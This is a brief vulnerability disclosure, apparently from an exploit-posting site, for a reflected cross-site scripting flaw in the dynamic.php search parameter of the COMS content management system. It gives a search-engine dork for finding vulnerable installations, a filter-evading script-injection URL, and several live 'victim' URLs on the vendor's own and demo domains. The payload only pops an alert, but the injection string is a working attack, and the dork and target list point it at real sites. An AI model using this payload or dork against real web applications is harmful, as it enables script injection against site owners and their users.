#########################################################
---------------------------------------------------------
Portal Name: COMS ( Contents & Object Management System )
Vendor : http://Coms.ir <http://coms.ir/>
Vulnerable File : dynamic.php
Dork: Copyright (C) 2005-2007 by COMS
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : XSS (Cross site scripting)
---------------------------------------------------------
#########################################################

http://site.ir/dynamic.php?la=fa&sys=search&q=%00"'><ScRiPt%20%0a%0d>alert(422446847572)%3B</ScRiPt>&site=main&action=new

---------------------------------
Victem :
http://coms.ir/dynamic.php?la=fa&sys=search&q=%00"'><ScRiPt%20%0a%0d>alert(422446847572)%3B</ScRiPt>&site=main&action=new

http://demo.coms.ir/dynamic.php?la=fa&sys=search&q=%00"'><ScRiPt%20%0a%0d>alert(422446847572)%3B</ScRiPt>&site=main&action=new